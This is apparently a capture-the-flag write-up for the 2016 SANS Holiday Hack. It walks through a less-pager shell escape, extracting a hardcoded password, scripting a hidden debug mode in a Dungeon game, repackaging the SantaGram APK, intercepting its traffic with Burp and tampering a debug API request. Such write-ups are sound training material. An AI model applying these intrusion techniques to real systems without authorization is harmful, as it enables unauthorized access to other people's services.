usage: wump [parameters]
elf@904691c2cd69:~$

OK. No help, but it looks like it accepts command line parameters. Let’s have a play.

elf@904691c2cd69:~$ ./wumpus -a
./wumpus: option requires an argument -- 'a'
usage: wump [parameters]
elf@904691c2cd69:~$ ./wumpus -a a
Instructions? (y-n) n
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 0 custom super anti-evil Wumpus arrows. Good luck.

You are in room 3 of the cave, and have 0 arrows left.
*rustle* *rustle* (must be bats nearby)
There are tunnels to rooms 6, 15, and 20.
Move or shoot? (m-s)

OK, so running with -a a opens the game but now I have 0 arrows. I had 5 before.

elf@904691c2cd69:~$ ./wumpus -a 100000
Instructions? (y-n) n
You're in a cave with 20 rooms and 3 tunnels leading from each room.
There are 3 bats and 3 pits scattered throughout the cave, and your
quiver holds 100000 custom super anti-evil Wumpus arrows. Good luck.

You are in room 8 of the cave, and have 100000 arrows left.
*rustle* *rustle* (must be bats nearby)
*whoosh* (I feel a draft from some pits).
There are tunnels to rooms 12, 17, and 19.
Move or shoot? (m-s)

Excellent, 100,000 custom super anti-evil Wumpus arrows. Let’s see what else we can set.

-a i = Number of arrows

-b i = Number of bats

-p i = Number of pits

-r i = Number of rooms (although Wumpus refuses to play with fewer than 6 rooms)

elf@904691c2cd69:~$ ./wumpus -b 0 -p 0 -a 100 -r 6
Instructions? (y-n) n
You're in a cave with 6 rooms and 3 tunnels leading from each room.
There are 0 bats and 0 pits scattered throughout the cave, and your
quiver holds 100 custom super anti-evil Wumpus arrows. Good luck.

You are in room 6 of the cave, and have 100 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 1, 3, and 5.
Move or shoot? (m-s) #

The Wumpus is in one of the adjoining rooms, so I’m just going to fire an arrow into each one.

You are in room 6 of the cave, and have 100 arrows left.
*sniff* (I can smell the evil Wumpus nearby!)
There are tunnels to rooms 1, 3, and 5.
Move or shoot? (m-s) s 1
*thwock!* *groan* *crash*

A horrible roar fills the cave, and you realize, with a smile, that you
have slain the evil Wumpus and won the game! You don't want to tarry for
long, however, because not only is the Wumpus famous, but the stench of
dead Wumpus is also quite well known, a stench plenty enough to slay the
mightiest adventurer at a single whiff!!

Passphrase:
WUMPUS IS MISUNDERSTOOD

Care to play another game? (y-n)

And we have the password to the next room: WUMPUS IS MISUNDERSTOOD

Workshop Train Station - OUTATIME

When you first open the terminal you are presented with the following

Great, let’s start the train.

==== MAIN MENU ====
STATUS:   Train Status
BRAKEON:  Set Brakes
BRAKEOFF: Release Brakes
START:    Start Train
HELP:     Open the help document
QUIT:     Exit console
menu:main> START
Checking brakes....
Brake must be off to start the train.
==== MAIN MENU ====
STATUS:   Train Status
BRAKEON:  Set Brakes
BRAKEOFF: Release Brakes
START:    Start Train
HELP:     Open the help document
QUIT:     Exit console
menu:main> BRAKEOFF
*******CAUTION*******
The brake has been released!
*******CAUTION*******
off
==== MAIN MENU ====
STATUS:   Train Status
BRAKEON:  Set Brakes
BRAKEOFF: Release Brakes
START:    Start Train
HELP:     Open the help document
QUIT:     Exit console
menu:main> START
Checking brakes....
Enter Password:

Needs a password. Let’s see if HELP gives us anything.

**STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level)
**BRAKEON** option enables the brakes. Brakes should be enabled at every stop and while the train is not in use.
**BRAKEOFF** option disables the brakes. Brakes must be disabled before the **START** command will execute.
**START** option will start the train if the brake is released and the user has the correct password.
**HELP** brings you to this file. If it's not here, this console cannot do it, unLESS you know something I don't.

Just in case you wanted to know, here's a really good Cranberry pie recipe:

Ingredients
1 recipe pastry for a 9 inch double crust pie
1 1/2 cups white sugar
1/3 cup all-purpose flour
1/4 teaspoon salt
1/2 cup water
1 (12 ounce) package fresh cranberries
1/4 cup lemon juice
1 dash ground cinnamon
2 teaspoons butter
:

Looks like the help is being displayed in less. We can confirm this by pressing the ‘h’ key and getting the less help screen.

                   SUMMARY OF LESS COMMANDS

      Commands marked with * may be preceded by a number, N.
      Notes in parentheses indicate the behavior if N is given.
      A key preceded by a caret indicates the Ctrl key; thus ^K is ctrl-K.

  h  H                 Display this help.
  q  :q  Q  :Q  ZZ     Exit.
 ---------------------------------------------------------------------------

If we read through the help file something really interesting jumps out.

 ---------------------------------------------------------------------------

                          MISCELLANEOUS COMMANDS

  -<flag>      Toggle a command line option [see OPTIONS below].
  --<name>     Toggle a command line option, by name.
  _<flag>      Display the setting of a command line option.
  __<name>     Display the setting of an option, by name.
  +cmd         Execute the less cmd each time a new file is examined.

  !command     Execute the shell command with $SHELL.

We can run shell commands with the ! prefix.

Let’s try opening an interactive shell with ! /bin/bash

! /bin/bash
conductor@5d2c1d3606d6:~$ ls -ahtl
total 40K
drwxr-xr-x 2 conductor conductor 4.0K Dec 10 19:39 .
drwxr-xr-x 6 root      root      4.0K Dec 10 19:39 ..
-rwxr-xr-x 1 root      root       11K Dec 10 19:36 ActivateTrain
-rw-r--r-- 1 root      root      1.5K Dec 10 19:36 TrainHelper.txt
-rwxr-xr-x 1 root      root      1.6K Dec 10 19:36 Train_Console
-rw-r--r-- 1 conductor conductor  220 Nov 12  2014 .bash_logout
-rw-r--r-- 1 conductor conductor 3.5K Nov 12  2014 .bashrc
-rw-r--r-- 1 conductor conductor  675 Nov 12  2014 .profile
conductor@5d2c1d3606d6:~$

Nice, ActivateTrain has the executable flag set. I wonder if it’s as simple as running this.

! ./ActivateTrain

            MONTH    DAY     YEAR      HOUR   MIN
           +-----+ +----+ +------+ O AM +----+ +----+
           | NOV | | 16 | | 1978 |      | 10 |:| 21 |
           +-----+ +----+ +------+ X PM +----+ +----+
                    DESTINATION TIME

            MONTH    DAY     YEAR      HOUR   MIN
           +-----+ +----+ +------+ X AM +----+ +----+
           | DEC | | 19 | | 2016 |      | 08 |:| 45 |
           +-----+ +----+ +------+ O PM +----+ +----+
                      PRESENT TIME

            MONTH    DAY     YEAR      HOUR   MIN
           +-----+ +----+ +------+ O AM +----+ +----+
           | NOV | | 16 | | 1978 |      | 10 |:| 21 |
           +-----+ +----+ +------+ X PM +----+ +----+
                   LAST TIME DEPARTED

[ASCII-art flux capacitor panel: "DISCONNECT CAPACITOR DRIVE BEFORE OPENING", "SHIELD EYES FROM LIGHT", and an ACTIVATE! button]

Press Enter to initiate time travel sequence.

Seems like this is the Back To The Future train, and it’s just sent us back to 1978.

And if you travel up to the top of the North Pole, through the Wumpus door and into the DFER room, you will find where Santa Claus is being held.

We found Santa :) But he doesn’t know who kidnapped him.

I had managed to bypass the train application, but I still wanted to know what the password was. So back to the console.

Running strings against the Train_Console application gives us the answer we were looking for.

conductor@5d2c1d3606d6:~$ strings Train_Console
#!/bin/bash
HOMEDIR="/home/conductor"
CTRL="$HOMEDIR/"
DOC="$HOMEDIR/TrainHelper.txt"
PAGER="less"
BRAKE="on"
PASS="24fb3e89ce2aa0ea422c3d511d40dd84"
print_header() {
echo ""
echo "Train Management Console: AUTHORIZED USERS ONLY"

Running the console again and using the password we found works as well.

Exploit Each of the Targets

We found Santa :) but our task is not yet complete. We need to know who took Santa and why.

Joshua came to the obvious conclusion, “You know, Jess, we should probably find the villain who tried to kidnap Santa and bring him to justice. If we don’t, Santa’s kidnapper could strike again! Neither Santa nor Christmas are really safe with this nefarious villain on the loose. How are we ever going to find this bad guy?” Jessica responded, “I’ve noticed some really interesting issues in that SantaGram application that might help us get to the bottom of this whole caper. But, I’d need to exploit SantaGram and its associated servers to do so. Do you think we’re allowed to attack these systems?”

Reading the full intro to question 7, it suggests the APK file will hold some clues, and that for any IPs we find we must check they are in scope by asking Tom Hessman in-game before starting any testing.

There are 6 items for us to retrieve audio files from.

The Mobile Analytics Server (Via credentialed login access)

The Dungeon Game

The Debug Server

The Banner Ad Server

The Uncaught Exception Handler Server

The Mobile Analytics Server (Post Authentication)

First let’s find all the targets. We know the APK holds clues and we already decompiled the source, so let’s have a look there.

thehermit@TECHANARCHY:~/Sans2016$ grep -r analytics SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
SantaGram_4.2/res/values/strings.xml:    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
SantaGram_4.2/res/values/public.xml:    <public type="string" name="analytics_launch_url" id="0x7f070015" />
SantaGram_4.2/res/values/public.xml:    <public type="string" name="analytics_usage_url" id="0x7f070016" />

Grepping for dungeon returns a similar result: a domain listed in the res/values/strings.xml file. So let’s take a closer look at that file.

<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_home_description_format">%1$s, %2$s</string>
    <string name="abc_action_bar_home_subtitle_description_format">%1$s, %2$s, %3$s</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="status_bar_notification_info_overflow">999+</string>
    <string name="TAG">SantaGram</string>
    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/report.php?type=launch</string>
    <string name="analytics_usage_url">https://analytics.northpolewonderland.com/report.php?type=usage</string>
    <string name="appVersion">4.2</string>
    <string name="app_name">SantaGram</string>
    <string name="appbar_scrolling_view_behavior">android.support.design.widget.AppBarLayout$ScrollingViewBehavior</string>
    <string name="banner_ad_url">http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5</string>
    <string name="bottom_sheet_behavior">android.support.design.widget.BottomSheetBehavior</string>
    <string name="character_counter_pattern">%1$d / %2$d</string>
    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
    <string name="debug_data_enabled">true</string>
    <string name="dungeon_url">http://dungeon.northpolewonderland.com/</string>
    <string name="exhandler_url">http://ex.northpolewonderland.com/exception.php</string>
    <string name="title_activity_comments">Comments</string>
</resources>

There are our domains. Let’s get the IPs with a quick nslookup so we can check what’s in scope.

analytics.northpolewonderland.com - 104.198.252.157

dungeon.northpolewonderland.com - 35.184.47.139

dev.northpolewonderland.com - 35.184.63.245

ex.northpolewonderland.com - 104.154.196.33

ads.northpolewonderland.com - 104.198.221.240

Tom confirms these are all in scope and suggests that dirbuster is not going to help me.

With the scope confirmed, let’s spin up a Kali box and get started.

analytics.northpolewonderland.com (Via Credentialed Logon)

Let’s go have a look at the site.

As was suggested, this needs a valid logon. We found a logon inside the APK earlier, so let’s try that.

Username = Guest, Password = busyreindeer78 and we are logged in successfully. More than that, right at the top of the menu bar is a link to download an MP3. Click the link and we get clip number 2, discombobulatedaudio2.mp3

https://techanarchy.net/assets/images/2016/12/discombobulatedaudio2.mp3

dungeon.northpolewonderland.com

Visiting the dungeon’s main page is not as revealing as the last pages were.

It looks like a game and an elf in the game will trade for secrets! Looks like we need to beat the game and talk to the elf. But where is the game?

Let’s spin up nmap and see what else is on this host. We run a basic nmap scan against the standard TCP ports.

. . . Snip . . .
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA)
|   2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA)
|_  256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA)
80/tcp    open  http    nginx 1.6.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.6.2
|_http-title: About Dungeon
11111/tcp open  vce?
. . . Snip . . .

An open port on 11111; spidey sense is tingling. Let’s point netcat at that port and see what we get.

root@kali:~# nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.                     This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>

Fun, an old-school MUD. Unlike the wumpus, I don’t think we can bypass this with command line options, and trying basic escape options doesn’t reveal any obvious flaws either.

>! /bin/bash
An interesting idea, but... Not a prayer.
>

Pepper Minstix, an elf in the North Pole, also gave us a link to an old version of the dungeon game: http://www.northpolewonderland.com/dungeon.zip It’s probably more useful to test this local copy rather than the online version for now.

With the game downloaded there are two files: dungeon and dtextc.dat. Running the dungeon binary gives us the same output as the netcat connection, so we are in the right place. Let’s start simple with strings.

There are some interesting strings in there but nothing that looks like what we are looking for. From these strings we can identify the game as Zork or at least a derivative of it. And this game is not small. The map shows many rooms and many challenges before reaching the end. Looks like I’m going to have to cheat.

There were some interesting commands in the binary that are not mentioned in the online help; let’s see if we can get to some of these.

Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take
No robber.
No troll.
No cyclops.
No deaths.
Restored robber.
Restored troll.
Restored cyclops.
Restored deaths.
Taken.

After playing around in the game for a while trying a few things, I decided to take a more systematic approach and use ltrace to see what's happening as the game is played.

```
root@kali:~/Desktop/dungeon# ltrace ./dungeon
__libc_start_main(0x4060a3, 1, 0x7fff14c5c378, 0x419570 <unfinished ...>
getenv("TERM") = "xterm-256color"
tgetent(0x7fff14c5b9f0, 0x7fff14c5edbf, 0x7fff14c5edbf, 12) = 1
tgetnum(0x41e088, 42, 0, 0) = 24
getuid() = 0
fopen("dtextc.dat", "r") = 0x19e62c0
_IO_getc(0x19e62c0) = '\0'
_IO_getc(0x19e62c0) = '\002'
_IO_getc(0x19e62c0) = '\0'
_IO_getc(0x19e62c0) = '\a'
_IO_getc(0x19e62c0) = '\0'
_IO_getc(0x19e62c0) = 'H'
_IO_getc(0x19e62c0) = '\002'
_IO_getc(0x19e62c0) = 'I'
. . .
_IO_getc(0x19e62c0) = '^'
_IO_getc(0x19e62c0) = '\332'
_IO_getc(0x19e62c0) = 'S'
_IO_getc(0x19e62c0) = '\332'
_IO_getc(0x19e62c0) = 'F'
_IO_getc(0x19e62c0) = '\332'
_IO_getc(0x19e62c0) = 'A'
ftell(0x19e62c0, 65, 0xffffffff, 0x7f7a5e7465c0) = 9063
time(0x7fff14c5c1f0) = 1481834271
localtime(0x7fff14c5c1f0) = 0x7f7a5ea084a0
chroot(0x41a524, 0, 51, 2016) = -1
perror("chroot"chroot: No such file or directory
) = <void>
setuid(1000) = 0
setgid(1000) = -1
fseek(0x19e62c0, 9063, 0, 9063) = 0
_IO_getc(0x19e62c0) = '\036'
putchar(87, 30, 73, 8192) = 87
_IO_getc(0x19e62c0) = '\005'
putchar(101, 5, 97, 512) = 101
_IO_getc(0x19e62c0) = '\0'
putchar(108, 0, 110, 0xfbad2a84) = 108
_IO_getc(0x19e62c0) = ','
. . .
_IO_getc(0x19e62c0) = '}'
putchar(45, 125, 97, 0xfbad2a84) = 45
_IO_getc(0x19e62c0) = 'k'
putchar(55, 107, 110, 0xfbad2a84) = 55
_IO_getc(0x19e62c0) = 'G'
putchar(56, 71, 76, 0xfbad2a84) = 56
_IO_getc(0x19e62c0) = '{'
putchar(46, 123, 97, 0xfbad2a84) = 46
_IO_getc(0x19e62c0) = '['
putchar(10, 91, 110, 0xfbad2a84Welcome to Dungeon.			This version created 11-MAR-78.
) = 10
fseek(0x19e62c0, 0x15237, 0, 0x15237) = 0
_IO_getc(0x19e62c0) = '\300'
putchar(89, 192, 73, 0x15000) = 89
_IO_getc(0x19e62c0) = '\337'
putchar(111, 223, 97, 0xfbad2a84) = 111
. . .
```

Lots more seeking and writing characters to the screen follows.

```
. . .
_IO_getc(0x1da82c0) = '\226'
putchar(101, 150, 121, 0xfbad2a84) = 101
_IO_getc(0x1da82c0) = '\225'
putchar(114, 149, 108, 0xfbad2a84) = 114
_IO_getc(0x1da82c0) = '\206'
putchar(101, 134, 111, 0xfbad2a84) = 101
_IO_getc(0x1da82c0) = '\321'
putchar(46, 209, 114, 0xfbad2a84) = 46
_IO_getc(0x1da82c0) = '\304'
putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
) = 10
putchar(62, 1, 0xe420, 1) = 62
fflush(0x7f1c38178600>) = 0
fgets(
```

Watching dungeon run: it opens the dat file and reads in all the chars, tries to set up a chroot jail (which fails), then writes chars from the dat file to the screen as text. It pauses at the end waiting for our input.

I try a simple command, 'look'.

```
putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
) = 10
putchar(62, 1, 0xe420, 1) = 62
fflush(0x7f1c38178600>) = 0
fgets(look
"look
", 78, 0x7f1c381778c0) = 0x625a84
__ctype_b_loc() = 0x7f1c385a76b0
toupper('l') = 'L'
__ctype_b_loc() = 0x7f1c385a76b0
toupper('o') = 'O'
__ctype_b_loc() = 0x7f1c385a76b0
toupper('o') = 'O'
__ctype_b_loc() = 0x7f1c385a76b0
toupper('k') = 'K'
strcmp("LOOK", "GDT") = 5
rand(6, 0, 0, 0) = 0x6b8b4567
fseek(0x1da82c0, 0x15237, 0, 0x15237) = 0
_IO_getc(0x1da82c0) = '\300'
putchar(89, 192, 73, 0x15000) = 89
```

Now that's interesting: it takes my input, converts it to uppercase and compares it against the string "GDT" before processing my actions. Let's see what happens if I give it GDT. I'm running this without ltrace for readability.

```
root@kali:~/Desktop/dungeon# ./dungeon
chroot: No such file or directory
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded front door.
There is a small wrapped mailbox here.
>GDT
GDT>help
Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take
GDT>
```

A hidden set of admin options. After playing around with some of the commands it's apparent I don't know enough about the game or its architecture to effectively cheat; however, I can display the text that's used in the game.

```
GDT>dt
Entry:  1
Welcome to Dungeon.			This version created 11-MAR-78.
GDT>dt
Entry:  2
Done.
GDT>dt
Entry:  3
Revision history:
11-NOV-16  Converted to HHC (V2.7HHC)
11-MAR-91  Converted to C (V2.7)
14-SEP-87  Converted to f77/Unix for pdps and Vaxen (V2.6B)
18-JUL-80  Transportable data base file (V2.5A).
28-FEB-80  Compressed text file (V2.4A).
15-NOV-79  Bug fixes (V2.3A).
18-JAN-79  Revised DECUS version (V2.2A).
10-OCT-78  Puzzle Room (V2.1A).
10-SEP-78  Endgame (V2.0A).
10-AUG-78  DECUS version (V1.1B).
14-JUN-78  Public version with parser (V1.1A).
4-MAR-78   Debugging version (V1.0A).
GDT>
```

But only one entry at a time. Time to script something that will read out all the entries for me. I have been playing with pexpect a lot lately, a Python library that can interact with command line tools.

```python
import pexpect

run_cmd = "./dungeon"

# Start the process (encoding="utf-8" so c.before is a str, not bytes)
c = pexpect.spawn(run_cmd, encoding="utf-8")

# Look for the > prompt
c.expect(">")

# Send GDT to enter the hidden debug mode
c.sendline("GDT")

# Wait for the prompt to display "GDT>"
c.expect("GDT>", timeout=60)

# Main loop
for i in range(2000):
    # Send "DT", wait for "Entry: " then send the next number in the loop
    c.sendline("DT")
    c.expect("Entry:")
    c.sendline(str(i))
    c.expect("GDT>")
    # Print everything the game returned before the prompt
    print(c.before)
```

What follows is a scrolling wall of text that prints out all the entries. At some point it will start printing blank lines and then random data; this is caused by trying to read entries that don't exist. We can just stop the output there and read back through it to find what we want.

```
1022 The thief, who is essentially a pragmatist, dispatches you as a threat to his livelihood.
1023 The elf, willing to bargain, says "What's in it for me?"
1024 The elf, satisified with the trade says - Try the online version for the true prize
1025 "That wasn't quite what I had in mind", he says, tossing the # into the fire, where it vanishes.
1026 The elf appears increasingly impatient.
1027 The elf says - you have conquered this challenge - the game will now end.
```

It worked: we can see what the elf is programmed to say, so now it's just a matter of running the script against the online version. We can do this by changing run_cmd to `nc dungeon.northpolewonderland.com 11111` and running the script again. This time we get the answer we are looking for, or at least the way to our answer.

```
1022 The thief, who is essentially a pragmatist, dispatches you as a threat to his livelihood.
1023 The elf, willing to bargain, says "What's in it for me?"
1024 The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek.
1025 "That wasn't quite what I had in mind", he says, tossing the # into the fire, where it vanishes.
```

A few minutes after sending the email we get a reply back.

And our next audio clip: discombobulatedaudio3.mp3

https://techanarchy.net/assets/images/2016/12/discombobulatedaudio3.mp3

There doesn't seem to be a lot going on here. nmap doesn't show much in the way of open ports, and the web page is blank. Trying a handful of pages reveals nothing. Let's take a look at the app and see if we can figure out where it is used.

Grep for dev.northpole:

```
root@kali:~/Sans2016$ grep -r dev.north SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
```

Grep for debug_data_collection:

```
root@kali:~/Sans2016$ grep -r debug_data_collection SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
SantaGram_4.2/res/values/public.xml:    <public type="string" name="debug_data_collection_url" id="0x7f07001d" />
```

Grep for 0x7f07001d:

```
root@kali:~/Sans2016$ grep -r 0x7f07001d SantaGram_4.2
SantaGram_4.2/res/values/public.xml:    <public type="string" name="debug_data_collection_url" id="0x7f07001d" />
SantaGram_4.2/smali/com/northpolewonderland/santagram/EditProfile$1.smali:    const v1, 0x7f07001d
```

OK, after following the chain of variable names we end up on the Edit Profile page. But viewing this source code doesn't show much.

We need to launch the app and intercept the traffic to try and understand what's going on here.

The simplest way is to run the app in a virtual environment. The two most popular methods are Android Studio or Genymotion.

To install Genymotion follow the official guides for your operating system. Once you have Genymotion installed, open up Burp and under Proxy -> Options configure Burp to listen on all interfaces.

Then in the Android VM go into Wi-Fi settings -> Modify Network and fill in the Proxy Settings for your Burp machine.

Drag the apk into the window and open it. When you first run it you may notice that the app fails to log on or register accounts; this is due to Burp using an untrusted certificate, and you can see the error under the Alerts tab in Burp. To fix this we need to export the certificate from Burp and install it in the Android VM.

Burp:

Under Proxy -> Options, Export CA Certificate -> Export -> Certificate in DER Format

Android:

Drag the certificate file on to the VM window to copy it on to the OS
Settings -> Security -> Install From SD Card
Choose Internal Storage -> Downloads (SD Card will not see the file)
Select the certificate file

With the certificate installed we can now properly intercept all HTTPS traffic.

We see a lot of traffic flowing around but we are interested in the Edit Profile page which should somehow lead us to the dev domain.

From here I can change some of my profile settings like Name and Bio. The email address can also be changed if you add the parameter into the request, but there is nothing about a dev subdomain.

Looking back in the apk source for all mentions of debug, we find an option to enable or disable debug mode, which is currently set to false.

```
root@kali:~/Sans2016$ grep -r debug SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_enabled">false</string>
```

Changing the XML file in the apk is not as simple as rezipping it. We need to recompile and sign the application.

Edit res/values/strings.xml and change debug_data_enabled to true.

Compile the APK:

```
root@kali:~/Sans2016$ apktool b SantaGram_4.2
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
```

To sign the APK we need to generate a key and then sign the APK with it. You may need to install a JDK with 'sudo apt-get install openjdk-9-jdk-headless'.

To generate a key use the keytool application:

```
root@kali:~/Sans2016$ keytool -genkey -v -keystore my-release-key.keystore -alias SantaGram -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:
Re-enter new password:
What is your first and last name?
  [Unknown]:  Santa
What is the name of your organizational unit?
  [Unknown]:  Gram
What is the name of your organization?
  [Unknown]:  SantaGram
What is the name of your City or Locality?
  [Unknown]:  NorthPole
What is the name of your State or Province?
  [Unknown]:  North
What is the two-letter country code for this unit?
  [Unknown]:  NP
Is CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP correct?
  [no]:  Yes

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
	for: CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP
Enter key password for <SantaGram>
	(RETURN if same as keystore password):
[Storing my-release-key.keystore]
```

Then sign it with jarsigner and our new key:

```
root@kali:~/Sans2016$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore SantaGram_4.2/dist/SantaGram_4.2.apk SantaGram
Enter Passphrase for keystore:
   adding: META-INF/MANIFEST.MF
   adding: META-INF/SANTAGRA.SF
   adding: META-INF/SANTAGRA.RSA
  signing: AndroidManifest.xml
  signing: assets/tou.html
  signing: classes.dex
  signing: res/anim-v21/design_bottom_sheet_slide_in.xml
. . . SNIP . . .
  signing: res/raw/discombobulatedaudio1.mp3
  signing: resources.arsc
jar signed.

Warning:
The signer's certificate is self-signed.
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-10) or after any future revocation date.
```

If all goes well you should be able to drag the new apk from SantaGram_4.2/dist/ into the VM and repeat the steps above to see the traffic to dev.northpolewonderland.com when opening the Edit Profile page.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

Great, now we know how to format the data we can start to play and see what we can get. From this point Burp is a bit heavy, and Chrome has a nice extension called Postman which is designed to quickly generate and view requests like this.

We can see that when sending the JSON string we get a response that echoes our request and gives us a filename.

{"date":"20161223112641","status":"OK","filename":"debug-20161223112641-0.txt","request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":false}}

We can check to see if this file exists: https://dev.northpolewonderland.com/debug-20161223112641-0.txt. It does exist, and shows us the JSON object we sent.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

After playing with a few POSTs and comparing the outputs we can see that in our response there is a field named "verbose" which is set to false. Let's try setting this to true by adding it into our POST.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504, "verbose": true}

And we get back a lot more information.

{"date":"20161223113154","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161223113154-0.txt","filename.len":26,"request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":true},"files":["debug-20161223112121-0.txt","debug-20161223112359-0.txt","debug-20161223112506-0.txt","debug-20161223112527-0.txt","debug-20161223112641-0.txt","debug-20161223113154-0.txt","debug-20161224235959-0.mp3","index.php"]}

Which includes an mp3 file: http://dev.northpolewonderland.com/debug-20161224235959-0.mp3

https://techanarchy.net/assets/images/2016/12/debug-20161224235959-0.mp3

Looking at the source code for the domain, after whitelisting the domain in your adblocker, we can see an interesting JavaScript tag:

__meteor_runtime_config__ = JSON.parse(decodeURIComponent("%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D"));

Pepper Minstix, an elf in the North Pole, told us about a tool for exploiting sites that use the Meteor framework.

Seems simple enough. Install the TamperMonkey extension in your browser of choice, then install the MeteorMiner script. The next time we load the ads page you should see the MeteorMiner interface load.

As we navigate around the pages (routes) by clicking on the grey >, we can see database entries (Collections) for pages even though we are not logged in.

